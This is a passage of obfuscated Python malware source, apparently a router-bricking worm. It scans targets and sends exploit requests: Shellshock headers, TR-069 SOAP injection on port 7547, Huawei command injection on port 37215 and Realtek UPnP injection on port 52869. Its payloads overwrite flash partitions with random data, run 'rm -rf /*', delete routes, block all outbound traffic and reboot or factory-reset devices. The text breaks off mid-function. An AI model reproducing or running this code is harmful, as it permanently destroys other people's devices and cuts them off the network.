IIIIiI iiIii1I1i1 = O0000o0 [ I11i1I ] if O0oOO [ iiIii1I1i1 ] : if 20 - 20: IIiIIiIii1I % Oooo / o0oooooO if 20 - 20: Ii11i1iIi % i1IIi1i1iiI OoO0oOoooo = 15 if Iioo0OooOoO - IIiiI [ I11i1I ] > OoO0oOoooo : if 81 - 81: Ii11i1iIi + oOOo0000o if 58 - 58: i1IIi1i1iiI - Oo0Oo + Oooo + o0oooooO * i1 if O0Oooo0ooo0 [ I11i1I ] == '' : O0Oooo0ooo0 [ I11i1I ] = '(timeout)' ; iIiIii111Ii ( O0O0 ) continue if 35 - 35: I11I1Ii . Ii11i1iIi * o0oooooO if 72 - 72: Oooo + Oo0 * IIiII + IIiIii1iI . O0oo . I11I1Ii if 91 - 91: OOooOO0 . Ii11i1iIi % OOooOO0 * Ii if 91 - 91: IIiIii1iI / IIiIii1iI + oOOo0000o + Oo0Oo % O0oo time . sleep ( 3 ) if 84 - 84: OOOoOooO / I11I1Ii % Oooo . Ii11i1iIi * o0ooO if 5 - 5: IIiIIiIii1I if 98 - 98: O0oo0OOOOO00 . O0oo0OOOOO00 . Oo0 % i1IIi1i1iiI . Oo0Oo - O0oo0OOOOO00 if 57 - 57: i1 if 3 - 3: oOoO0Ooo - o0ooO o0iIiI1Ii1Ii = 20 i1iii1I11 = 7 if 17 - 17: OOooOO0 / O0oo % I11I1Ii % IIiIIiIii1I if 16 - 16: i1IIi1i1iiI * Oo0 + Ii - o0oooooO if 50 - 50: O0oo + oOOo0000o + Oooo if 93 - 93: I11I1Ii % oOOoO00oo0 - oOoO0Ooo / O0oo + oOoO0Ooo if 58 - 58: O0oo O0ooOOo0o = [ ] OOi11i11IIii11 = { } I11IO0O00o0 = { } iIiiiIIIII1i1 = { } oOOoOoO = { } Oo0OoOOoo00o = { } I11Ii11iiiii1 = { } if 48 - 48: OOooOO0 % Oo0 iii11II1I1I = [ ] i1iI = { } oOOOOOO0OO0 = { } iI1I1IiI1II1 = { } iI1IIi = { } ooOOoooOo = { } if 20 - 20: o0ooO - oOOo0000o + I11I1Ii / o0ooO + oOOo0000o % oOOo0000o if 12 - 12: IIiIIiIii1I - oOoO0Ooo + IIiII + IIiIii1iI + i1 if 94 - 94: oOOo0000o . IIiII oooOoo0O = 'POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:%d\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n' II1I1 = '`' Iii1i1i = '`' i1I = '``route del default``iptables -A OUTPUT -j DROP`' if 41 - 41: oOoO0Ooo / OOOoOooO if 66 - 66: o0ooO / oOoO0Ooo o0o0000o00o = [ 'busybox cat /dev/urandom >/dev/mtdblock0;busybox cat /dev/urandom >/dev/mtdblock1;busybox cat /dev/urandom >/dev/mtdblock2;busybox cat /dev/urandom >/dev/mtdblock3;busybox cat /dev/urandom >/dev/mtdblock4;busybox cat /dev/urandom >/dev/mtdblock5' , 'busybox cat /dev/urandom >/dev/mtdblock0;busybox cat /dev/urandom >/dev/mtdblock1;busybox cat /dev/urandom >/dev/mtdblock2;busybox cat /dev/urandom >/dev/mtdblock3;busybox cat /dev/urandom >/dev/mtdblock4;busybox cat /dev/urandom >/dev/mtdblock5 &' , 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/mtdblock4;cat /dev/urandom >/dev/mtdblock5' , 'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/mtdblock4;cat /dev/urandom >/dev/mtdblock5 &' , 'cat /dev/urandom >/dev/root' , 'dd if=/dev/urandom of=/dev/root' , 'busybox cat /dev/urandom >/dev/root' , 'GET / HTTP/1.0\r\nUser-Agent: () { :;};cat /dev/urandom >/dev/root\r\nConnection: close\r\n\r\n' , 'GET / HTTP/1.0\r\nUser-Agent: () { :;};dd if=/dev/urandom of=/dev/root\r\nConnection: close\r\n\r\n' , 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:WANEthernetInterfaceConfig:1#SetEnable\r\nContent-Type: text/xml\r\nContent-Length: 336\r\n\r\n 0 ' , 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:WANPPPConnection:1#SetEnable\r\nContent-Type: text/xml\r\nContent-Length: 326\r\n\r\n 0 ' , 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:WANIPConnection:1#SetEnable\r\nContent-Type: text/xml\r\nContent-Length: 325\r\n\r\n 0 ' , 'route del default;iproute del default;ip route del default;iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP;rm -rf /*' , 'ifconfig eth0 down;ifconfig wlan0 down' , 'iptables -A OUTPUT -j DROP' , 'route del default' , 'poweroff' , 'rm -rf /*' , 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:DeviceConfig:1#FactoryReset\r\nContent-Type: text/xml\r\nContent-Length: 304\r\n\r\n ' , 'GET / HTTP/1.0\r\nCookie: C\r\n\r\n' , 'GET / HTTP/1.0\r\nUser-Agent: () { :;};route del default;ip route del default;iproute del default;rm -rf *;rm -rf /*\r\n\r\n' , 'reboot' , 'POST /UD/act/?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nSOAPAction: urn:dslforum-org:service:DeviceConfig:1#Reboot\r\nContent-Type: text/xml\r\nContent-Length: 292\r\n\r\n ' , ] if 71 - 71: IIiIii1iI * OOooOO0 o0OOoo0ooO00o = 'POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %%TARGETIP%%:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n$(/bin/busybox cat /dev/urandom >/dev/mtdblock0;/bin/busybox cat /dev/urandom >/dev/mtdblock3;/bin/busybox cat /dev/urandom >/dev/mtdblock1;/bin/busybox cat /dev/urandom >/dev/mtdblock2;/bin/busybox cat /dev/urandom >/dev/mtdblock4;/bin/iptables -A OUTPUT -j DROP)$(echo HUAWEIUPNP)' if 67 - 67: IIiIii1iI * o0oooooO IIiI = [ 'POST /picdesc.xml HTTP/1.1\r\nHost: %%TARGETIP%%:52869\r\nContent-Length: 866\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nConnection: keep-alive\r\n\r\n%%RAND16A%%TCP%%RAND16B%%`busybox cat /dev/urandom >/dev/mtdblock0;busybox cat /dev/urandom >/dev/mtdblock1;busybox cat /dev/urandom >/dev/mtdblock2;busybox cat /dev/urandom >/dev/mtdblock3;busybox cat /dev/urandom >/dev/mtdblock4;busybox cat /dev/urandom >/dev/mtdblock5;busybox cat /dev/urandom >/dev/mtdblock6`1syncthing0' , 'POST /picdesc.xml HTTP/1.1\r\nHost: %%TARGETIP%%:52869\r\nContent-Length: 873\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nConnection: keep-alive\r\n\r\n%%RAND16A%%TCP%%RAND16B%%`busybox cat /dev/urandom >/dev/mtdblock/0;busybox cat /dev/urandom >/dev/mtdblock/1;busybox cat /dev/urandom >/dev/mtdblock/2;busybox cat /dev/urandom >/dev/mtdblock/3;busybox cat /dev/urandom >/dev/mtdblock/4;busybox cat /dev/urandom >/dev/mtdblock/5;busybox cat /dev/urandom >/dev/mtdblock/6`1syncthing0' , 'POST /picdesc.xml HTTP/1.1\r\nHost: %%TARGETIP%%:52869\r\nContent-Length: 798\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nConnection: keep-alive\r\n\r\n%%RAND16A%%TCP%%RAND16B%%`busybox cat /dev/urandom >/dev/root;route del default;iptables -A OUTPUT -j DROP;busybox route del default;/bin/route del default;/sbin/route del default;/sbin/iptables -A OUTPUT -j DROP;/bin/iptables -A OUTPUT -j DROP`1syncthing0' , ] if 20 - 20: oOOoO00oo0 - o0ooO . Ii11i1iIi + O0oo . IIiIIiIii1I * o0oooooO if 4 - 4: oOOo0000o - oOOo0000o def OOo0OooO00 ( targetport , index ) : global II1I1 global o0o0000o00o global Iii1i1i global i1I global oooOoo0O global o0OOoo0ooO00o if 51 - 51: O0oo % i1 / i1IIi1i1iiI + IIiII if targetport == 37215 : return o0OOoo0ooO00o if 39 - 39: i1IIi1i1iiI - O0oo0OOOOO00 - Ii11i1iIi * oOoO0Ooo * oOOo0000o - IIiIii1iI if targetport == 52869 : return IIiI [ index % 3 ] if 57 - 57: o0ooO - i1IIi1i1iiI . IIiIIiIii1I * O0oo0OOOOO00 if 'POST /UD/act/' in o0o0000o00o [ index ] or 'GET / HTTP' in o0o0000o00o [ index ] : return o0o0000o00o [ index ] ; else : o0OOo00 = II1I1 ; o0OOo00 += o0o0000o00o [ index ] if index < 5 or random . randint ( 0 , 99 ) < 30 : o0OOo00 += Iii1i1i else : o0OOo00 += i1I I1111II1 = oooOoo0O % ( targetport , len ( o0OOo00 ) ) return I1111II1 + o0OOo00 if 74 - 74: i1 / IIiIIiIii1I . Oooo if 100 - 100: Ii / O0oo0OOOOO00 / o0ooO + Oooo / i1IIi1i1iiI . I11I1Ii def O0iII111i1 ( targetip , targetport ) : global OO00oo0o if 4 - 4: o0ooO . IIiIii1iI / o0oooooO if not OO00oo0o : return if 23 - 23: OOOoOooO * Oooo O0000oO0O = ( targetip , int ( targetport ) ) I11i1I = hash ( O0000oO0O ) if I11i1I in iii11II1I1I : if 28 - 28: o0oooooO % O0oo return ; if 32 - 32: i1IIi1i1iiI / Oo0Oo * IIiIIiIii1I - o0oooooO + o0ooO if 92 - 92: oOOo0000o + Ii11i1iIi . i1 * O0oo / O0oo0OOOOO00 + oOoO0Ooo oOOOOOO0OO0 [ I11i1I ] = 0 if 39 - 39: o0oooooO - O0oo / oOOo0000o + Oo0 oO0o00Oo0 = random . randint ( 0 , 99 ) if oO0o00Oo0 < 20 : oOOOOOO0OO0 [ I11i1I ] = 9 elif oO0o00Oo0 < 40 : oOOOOOO0OO0 [ I11i1I ] = 5 elif oO0o00Oo0 < 60 : oOOOOOO0OO0 [ I11i1I ] = 18 i1iI [ I11i1I ] = ( targetip , int ( targetport ) ) iI1IIi [ I11i1I ] = 0 ooOOoooOo [ I11i1I ] = None iii11II1I1I . append ( I11i1I ) if 11 - 11: OOOoOooO def iiiO0O000OoO0 ( targetip , targetport , request , jobhash ) : O0000oO0O = ( targetip , int ( targetport ) ) if 78 - 78: i1IIi1i1iiI . oOOoO00oo0 O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0OOo00o00o . setblocking ( 0 ) if 81 - 81: Ii + o0ooO if 97 - 97: O0oo / o0ooO + oOOo0000o - Ii try : O0OOo00o00o . connect ( O0000oO0O ) except : pass if 66 - 66: oOoO0Ooo * Oo0 * i1 % O0oo + IIiIii1iI if 81 - 81: oOoO0Ooo + oOoO0Ooo + o0oooooO + oOOoO00oo0 * IIiII - IIiIii1iI if '%' in request : if '%%TARGETIP%%' in request : request = re . sub ( '%%TARGETIP%%' , targetip , request ) if '%%RAND16A%%' in request : request = re . sub ( '%%RAND16A%%' , '%d' % ( random . uniform ( 10000 , 65535 ) ) , request ) if '%%RAND16B%%' in request : request = re . sub ( '%%RAND16B%%' , '%d' % ( random . uniform ( 10000 , 65535 ) ) , request ) if 75 - 75: oOOo0000o . OOOoOooO % oOOo0000o * o0ooO I11i1I = hash ( O0OOo00o00o ) O0ooOOo0o . append ( O0OOo00o00o ) OOi11i11IIii11 [ I11i1I ] = ( targetip , int ( targetport ) , request ) oOOoOoO [ I11i1I ] = 0 Oo0OoOOoo00o [ I11i1I ] = request iIiiiIIIII1i1 [ I11i1I ] = '' I11Ii11iiiii1 [ I11i1I ] = time . time ( ) I11IO0O00o0 [ I11i1I ] = jobhash ooOOoooOo [ jobhash ] = O0OOo00o00o iI1I1IiI1II1 [ jobhash ] = '' return O0OOo00o00o if 39 - 39: Oo0Oo / Oooo def i1I11i1I111 ( webhash ) : global i11iiiIi if 25 - 25: IIiII + O0oo / Ii11i1iIi if i11iiiIi : Ii111i11iIi ( "%s:%d TR:%s" % ( i1iI [ webhash ] [ 0 ] , i1iI [ webhash ] [ 1 ] , iI1I1IiI1II1 [ webhash ] ) ) if 26 - 26: OOooOO0 oOOOOOO0OO0 [ webhash ] = None i1iI [ webhash ] = None iI1IIi [ webhash ] = None ooOOoooOo [ webhash ] = None iI1I1IiI1II1 [ webhash ] = None iii11II1I1I . remove ( webhash ) if 10 - 10: O0oo0OOOOO00 * i1 + Ii11i1iIi def IIii1i1i ( sock ) : global tr69client_maxattempts global i1iii1I11 global o0iIiI1Ii1Ii if 71 - 71: oOOoO00oo0 I11i1I = hash ( sock ) iiIii1I1i1 = I11IO0O00o0 [ I11i1I ] if 3 - 3: i1IIi1i1iiI * Ii11i1iIi . O0oo0OOOOO00 % OOOoOooO + o0oooooO + OOooOO0 try : sock . close ( ) except : pass if 74 - 74: I11I1Ii + Ii11i1iIi % oOoO0Ooo % OOooOO0 OOoOoooOo0 = 0 if 29 - 29: Ii11i1iIi iI1I1IiI1II1 [ iiIii1I1i1 ] = '' ; try : iI1I1IiI1II1 [ iiIii1I1i1 ] = iIiiiIIIII1i1 [ I11i1I ] . split ( '\n' ) [ 0 ] . strip ( ) except : pass if 44 - 44: oOOo0000o oOOOOOO0OO0 [ iiIii1I1i1 ] += 1 if 9 - 9: i1IIi1i1iiI . Oo0 + IIiIIiIii1I if 99 - 99: Oooo . OOooOO0 * IIiII if 63 - 63: Ii11i1iIi Iioo0OooOoO = time . time ( ) if iI1IIi [ iiIii1I1i1 ] <= Iioo0OooOoO : iI1IIi [ iiIii1I1i1 ] = time . time ( ) + i1iii1I11 ooOOoooOo [ iiIii1I1i1 ] = None if 83 - 83: IIiII . Ii11i1iIi O0ooOOo0o . remove ( sock ) OOi11i11IIii11 [ I11i1I ] = None oOOoOoO [ I11i1I ] = None Oo0OoOOoo00o [ I11i1I ] = None iIiiiIIIII1i1 [ I11i1I ] = None I11Ii11iiiii1 [ I11i1I ] = None I11IO0O00o0 [ I11i1I ] = None if 41 - 41: I11I1Ii * Oo0Oo % oOOo0000o + O0oo0OOOOO00 * i1 % O0oo def oOOoOO ( ) : global o0o0000o00o if 11 - 11: oOoO0Ooo + oOoO0Ooo Iioo0OooOoO = time . time ( ) OO00ooo0 = iii11II1I1I for IIIiiiI in OO00ooo0 : iiIii1I1i1 = hash ( IIIiiiI ) if 29 - 29: Ii11i1iIi * o0oooooO % Ii % oOOoO00oo0 / Oo0 . IIiIii1iI if ooOOoooOo [ iiIii1I1i1 ] == None : if 9 - 9: IIiII + o0oooooO * Ii11i1iIi * IIiIii1iI if oOOOOOO0OO0 [ iiIii1I1i1 ] >= len ( o0o0000o00o ) : if 84 - 84: i1IIi1i1iiI % i1 i1I11i1I111 ( iiIii1I1i1 ) continue if 66 - 66: Ii if 49 - 49: i1 if Iioo0OooOoO >= iI1IIi [ iiIii1I1i1 ] : if 8 - 8: I11I1Ii * IIiIii1iI . i1IIi1i1iiI . Oo0 + Oo0Oo O0OOo00o00o = iiiO0O000OoO0 ( i1iI [ iiIii1I1i1 ] [ 0 ] , i1iI [ iiIii1I1i1 ] [ 1 ] , OOo0OooO00 ( i1iI [ iiIii1I1i1 ] [ 1 ] , oOOOOOO0OO0 [ iiIii1I1i1 ] ) , iiIii1I1i1 ) ooOOoooOo [ iiIii1I1i1 ] = O0OOo00o00o iI1IIi [ iiIii1I1i1 ] = 0 if 35 - 35: I11I1Ii . IIiIIiIii1I + O0oo + O0oo - i1 . o0oooooO if 1 - 1: OOOoOooO def o000oooOOo ( sock , webhash , jobhash ) : try : if 14 - 14: Ii - i1IIi1i1iiI * O0oo + Oooo % o0ooO sock . send ( Oo0OoOOoo00o [ webhash ] ) except : pass if 20 - 20: Oo0 / O0oo return 1 if 13 - 13: I11I1Ii - Oo0Oo % O0oo + Ii11i1iIi + IIiIIiIii1I % O0oo def Ooo0OO ( ) : global o0iIiI1Ii1Ii global tr69client_maxconnectiontime_payload if 65 - 65: Oo0Oo * Oo0 . oOOo0000o . Ii - oOoO0Ooo - Oo0Oo Iioo0OooOoO = time . time ( ) if 77 - 77: i1 . i1IIi1i1iiI . o0oooooO % o0ooO if 1 - 1: I11I1Ii O00Oo = 0.01 IIiI1i , O0o0 , IiIIiI11I = select . select ( O0ooOOo0o , O0ooOOo0o , [ ] , O00Oo ) for O0O0 in O0ooOOo0o : I11i1I = hash ( O0O0 ) o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) if o0oo0OOOo != 0 : if 30 - 30: oOoO0Ooo - oOOo0000o / IIiIii1iI . O0oo0OOOOO00 if iIiiiIIIII1i1 [ I11i1I ] == '' : iIiiiIIIII1i1 [ I11i1I ] = '(timeout)' ; IIii1i1i ( O0O0 ) continue if O0O0 in IIiI1i : O0 = '' try : O0 = O0O0 . recv ( 2048 ) except : pass if O0 : iIiiiIIIII1i1 [ I11i1I ] += O0 if 43 - 43: IIiII - i1IIi1i1iiI % Oo0Oo / I11I1Ii / oOOoO00oo0 if 6 - 6: IIiIii1iI . i1 + I11I1Ii / IIiIIiIii1I if 90 - 90: o0ooO + Oo0 - OOOoOooO / i1IIi1i1iiI if 78 - 78: o0ooO / I11I1Ii . IIiII * O0oo0OOOOO00 i1iIII = iIiiiIIIII1i1 [ I11i1I ] . find ( '\r\n\r\n' ) if i1iIII >= 0 : i1iIII += 4 else : i1iIII = iIiiiIIIII1i1 [ I11i1I ] . find ( '\n\n' ) if i1iIII >= 0 : i1iIII += 2 if 76 - 76: I11I1Ii - IIiIii1iI + O0oo % o0oooooO . I11I1Ii if i1iIII >= 0 : if 32 - 32: o0oooooO + o0oooooO % Oooo Oo00oO0O = re . search ( 'Content-Length:\s*(\d+)' , iIiiiIIIII1i1 [ I11i1I ] ) if Oo00oO0O : Oo00Ooo0O0Oo = int ( Oo00oO0O . group ( 1 ) ) if 98 - 98: oOoO0Ooo * Ii11i1iIi % i1 - o0oooooO + O0oo0OOOOO00 if 13 - 13: O0oo0OOOOO00 . Ii * IIiII - oOOo0000o - oOOoO00oo0 / O0oo0OOOOO00 if 40 - 40: i1IIi1i1iiI / O0oo0OOOOO00 . OOooOO0 if 25 - 25: oOOoO00oo0 * Oooo . oOOo0000o + oOOoO00oo0 - Ii11i1iIi if len ( iIiiiIIIII1i1 [ I11i1I ] ) - i1iIII == Oo00Ooo0O0Oo : if 51 - 51: Ii11i1iIi . I11I1Ii * IIiII / o0oooooO * O0oo0OOOOO00 / Oooo IIii1i1i ( O0O0 ) continue if 42 - 42: Oo0Oo - IIiIIiIii1I - Ii / i1 if 45 - 45: oOOoO00oo0 else : IIii1i1i ( O0O0 ) continue if O0O0 in O0o0 : if oOOoOoO [ I11i1I ] == 0 : if 58 - 58: oOoO0Ooo * IIiII . Ii / O0oo / oOOoO00oo0 iiIii1I1i1 = I11IO0O00o0 [ I11i1I ] o000oooOOo ( O0O0 , I11i1I , iiIii1I1i1 ) oOOoOoO [ I11i1I ] = 1 if 87 - 87: OOOoOooO . Ii + i1IIi1i1iiI % I11I1Ii - O0oo OoO0oOoooo = o0iIiI1Ii1Ii iiIii1I1i1 = I11IO0O00o0 [ I11i1I ] if Iioo0OooOoO - I11Ii11iiiii1 [ I11i1I ] > OoO0oOoooo : if 33 - 33: oOoO0Ooo / I11I1Ii * o0oooooO * o0oooooO * i1 / IIiII if iIiiiIIIII1i1 [ I11i1I ] == '' : iIiiiIIIII1i1 [ I11i1I ] = '(timeout)' ; IIii1i1i ( O0O0 ) continue if 26 - 26: oOOo0000o / O0oo0OOOOO00 - oOOoO00oo0 - Ii if 45 - 45: O0oo0OOOOO00 if 64 - 64: oOOoO00oo0 * Ii if 93 - 93: OOOoOooO if 57 - 57: Oooo + OOOoOooO / IIiIii1iI O0O = "SPLTX" if 70 - 70: IIiII / Oo0Oo if 19 - 19: o0ooO % I11I1Ii / Oo0 % IIiIii1iI * Oo0 + OOOoOooO if 61 - 61: Ii if 95 - 95: o0ooO / i1IIi1i1iiI . OOOoOooO - O0oo0OOOOO00 / Ii11i1iIi - o0oooooO O0i1 = { } OoOOOOo00 = [ ] I1Iii1i1Ii = [ ] IIiiI111iii = { } if 9 - 9: i1IIi1i1iiI / IIiIii1iI - Oooo % o0oooooO / i1 - oOoO0Ooo def O00000O ( ip , port ) : global O0i1 global OoOOOOo00 global IIiiI111iii global I1Iii1i1Ii if 14 - 14: I11I1Ii if port > 0 : O00000O ( ip , 0 ) O0O0iIiIIIIiiII1I = hash ( ( ip , port ) ) if O0O0iIiIIIIiiII1I in IIiiI111iii : return IIiiI111iii [ O0O0iIiIIIIiiII1I ] = 1 if not port in OoOOOOo00 : OoOOOOo00 . append ( port ) if not port in O0i1 or O0i1 [ port ] == None : O0i1 [ port ] = 0 if port : i1II1 = "%s:%d" % ( ip , port ) if not i1II1 in I1Iii1i1Ii : I1Iii1i1Ii . append ( i1II1 ) O0i1 [ port ] += 1 if 37 - 37: Oo0Oo % OOooOO0 . o0oooooO - Oooo def III1iiIiiI ( ) : global O0i1 global OoOOOOo00 global IIiiI111iii global I1Iii1i1Ii oOOo0OO = 'INPST:' for Ooo0o0oOO0o in OoOOOOo00 : oOOo0OO += ' %d:%d' % ( Ooo0o0oOO0o , O0i1 [ Ooo0o0oOO0o ] ) return oOOo0OO if 9 - 9: i1IIi1i1iiI % Oooo + oOOo0000o - OOooOO0 def iIiiiiii1III1 ( ) : global O0i1 global OoOOOOo00 global IIiiI111iii global I1Iii1i1Ii oOOo0OO = 'INPSI:' for i1II1 in I1Iii1i1Ii : oOOo0OO += ' %s' % i1II1 return oOOo0OO if 63 - 63: Oooo * OOooOO0 def iiOo0000O ( ) : global O0i1 global OoOOOOo00 global IIiiI111iii global I1Iii1i1Ii O0i1 = { } OoOOOOo00 = [ ] I1Iii1i1Ii = [ ] IIiiI111iii = { } if 66 - 66: Oooo / Ii11i1iIi if 57 - 57: O0oo . I11I1Ii / Oooo + oOOo0000o if 59 - 59: Ii * Oo0Oo * IIiII * oOOoO00oo0 def oooOoO0 ( job ) : o0O0o00O = job [ 0 ] iIi11 = len ( Oo0Oooo ) if 48 - 48: O0oo0OOOOO00 + oOoO0Ooo % O0oo . Oooo if iIi11 == 0 : Oo0Oooo . append ( job ) return if Oo0Oooo [ 0 ] [ 0 ] < o0O0o00O : Oo0Oooo . insert ( 0 , job ) return if Oo0Oooo [ iIi11 - 1 ] [ 0 ] > o0O0o00O : Oo0Oooo . append ( job ) return if 86 - 86: o0oooooO * oOOo0000o % oOOo0000o iii1 = 0 oo00o = iIi11 - 1 while True : if oo00o - iii1 <= 1 : if Oo0Oooo [ iii1 ] [ 0 ] > o0O0o00O : Oo0Oooo . insert ( oo00o , job ) return Oo0Oooo . insert ( iii1 , job ) return o00OO0o0 = int ( ( iii1 + oo00o ) / 2 ) if Oo0Oooo [ o00OO0o0 ] [ 0 ] > o0O0o00O : iii1 = o00OO0o0 else : if Oo0Oooo [ o00OO0o0 ] [ 0 ] == o0O0o00O : Oo0Oooo . insert ( o00OO0o0 , job ) return oo00o = o00OO0o0 if 8 - 8: IIiIIiIii1I + i1IIi1i1iiI / Oo0Oo * IIiIii1iI . Ii if 54 - 54: oOoO0Ooo . OOOoOooO / oOOo0000o * Oooo def III111I1 ( timeval ) : oOOoooo00o = [ ] while len ( Oo0Oooo ) > 0 and Oo0Oooo [ len ( Oo0Oooo ) - 1 ] [ 0 ] <= timeval : oOOoooo00o . append ( Oo0Oooo . pop ( ) ) return oOOoooo00o if 57 - 57: OOooOO0 def iIiI1III11 ( ) : for O0OooO0Oo0O in range ( len ( Oo0Oooo ) - 1 ) : if Oo0Oooo [ O0OooO0Oo0O ] [ 0 ] < Oo0Oooo [ O0OooO0Oo0O + 1 ] [ 0 ] : return 1 return 0 if 63 - 63: O0oo . Oo0 def iII1I1I ( ip , port ) : global I1i1 if 88 - 88: oOOoO00oo0 - Ii / Oooo - i1 - oOoO0Ooo if 88 - 88: i1IIi1i1iiI global O0o0O0O0oOo0O if ip == O0o0O0O0oOo0O : return if 71 - 71: IIiIIiIii1I + OOooOO0 . IIiII if 69 - 69: IIiII + Ii11i1iIi * OOooOO0 % i1 + oOOo0000o o000oO0ooO = o0o * len ( oOiI1iIiIi111 ) + I1i1 if 14 - 14: OOOoOooO / OOooOO0 . oOOoO00oo0 . OOooOO0 * Ii11i1iIi if len ( ii1o00 ) >= o000oO0ooO : if 55 - 55: IIiIIiIii1I . Ii11i1iIi % Ii11i1iIi - oOOoO00oo0 . Oo0 ooo000oO = int ( len ( ii1o00 ) / o000oO0ooO ) + 1 o000oO0ooO = 0 for O000Oo0O0Oo0 in range ( o0o ) : for oo0OOOo00oOOO0OO in oOiI1iIiIi111 : ii1o00 . insert ( o000oO0ooO , "%s:%d" % ( ip , oo0OOOo00oOOO0OO ) ) if 48 - 48: o0ooO o000oO0ooO += ooo000oO for OO0Oo in range ( I1i1 ) : ii1o00 . insert ( o000oO0ooO , "%s:%d" % ( ip , random . randint ( 1 , 65535 ) ) ) o000oO0ooO += ooo000oO else : for OO0Oo in range ( I1i1 ) : ii1o00 . insert ( 0 , "%s:%d" % ( ip , random . randint ( 1 , 65535 ) ) ) for O000Oo0O0Oo0 in range ( o0o ) : for oo0OOOo00oOOO0OO in oOiI1iIiIi111 : ii1o00 . insert ( 0 , "%s:%d" % ( ip , oo0OOOo00oOOO0OO ) ) if 67 - 67: oOOoO00oo0 % OOooOO0 - OOOoOooO / I11I1Ii def IIii1IIi1I ( ip , scanport ) : if 27 - 27: Oo0 + IIiII - oOOo0000o global O0o0O0O0oOo0O if ip == O0o0O0O0oOo0O : Ii111i11iIi ( 'NOTC: Ignoring sentinel IP %s' % ( O0o0O0O0oOo0O ) ) return if 26 - 26: O0oo0OOOOO00 - OOooOO0 if 26 - 26: O0oo / i1 % Ii11i1iIi + i1 o000oO0ooO = o0o * len ( oOiI1iIiIi111 ) if 95 - 95: OOooOO0 % IIiIIiIii1I - i1IIi1i1iiI * oOOo0000o / OOOoOooO if len ( ii1o00 ) >= o000oO0ooO : if 79 - 79: I11I1Ii % O0oo0OOOOO00 / o0oooooO + i1IIi1i1iiI + o0oooooO + OOOoOooO ooo000oO = int ( len ( ii1o00 ) / o000oO0ooO ) + 1 o000oO0ooO = 0 ii1o00 . insert ( o000oO0ooO , "%s:%d" % ( ip , scanport ) ) if 61 - 61: oOoO0Ooo % IIiIii1iI % oOOo0000o * oOOoO00oo0 . Ii - Ii11i1iIi o000oO0ooO += ooo000oO else : if 12 - 12: o0ooO % i1 / oOOoO00oo0 if 41 - 41: O0oo0OOOOO00 / IIiIii1iI * IIiII / O0oo0OOOOO00 + oOOoO00oo0 - i1IIi1i1iiI ii1o00 . insert ( 0 , "%s:%d" % ( ip , scanport ) ) if 45 - 45: oOoO0Ooo . oOoO0Ooo * i1 * IIiII * Oo0Oo def oo0OO0ooo0 ( ) : if not i1iii : return if 80 - 80: Ii11i1iIi - IIiIii1iI * OOooOO0 * IIiIIiIii1I if len ( ii1o00 ) > 0 : IIiiIIIiIi1I = ii1o00 . pop ( ) ; Ii1iiIi = IIiiIIIiIi1I . split ( ':' ) iiIi1I1 = hash ( IIiiIIIiIi1I ) if iiIi1I1 in oO0iIiiiii1 : if 75 - 75: oOOoO00oo0 + Oo0Oo + oOOoO00oo0 % IIiIii1iI return oO0O0O = ( Ii1iiIi [ 0 ] , int ( Ii1iiIi [ 1 ] ) ) if 51 - 51: O0oo . Ii * o0oooooO O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0OOo00o00o . setblocking ( 0 ) i1I1I11iii1i = hash ( O0OOo00o00o ) O000O0o0oOOo [ i1I1I11iii1i ] = time . time ( ) try : O0OOo00o00o . connect ( oO0O0O ) except : pass o0o0oOOo . append ( O0OOo00o00o ) i11I11III1iii [ i1I1I11iii1i ] = IIiiIIIiIi1I if 39 - 39: I11I1Ii . oOOo0000o / IIiIii1iI % oOOo0000o def i111 ( scansock ) : global oOI11IIIi1II111 global I1i global Oo0O00OOooO global IiiI1 global OO00oo0o global OOoOo00oO0 global iIii1IiI11II1 if 39 - 39: o0oooooO . oOoO0Ooo / I11I1Ii / IIiIIiIii1I try : scansock . close ( ) except : pass o0o0oOOo . remove ( scansock ) i1I1I11iii1i = hash ( scansock ) if 5 - 5: OOooOO0 * oOOoO00oo0 . IIiII - Ii11i1iIi if i1I1I11iii1i in O0OO0O00000 and not 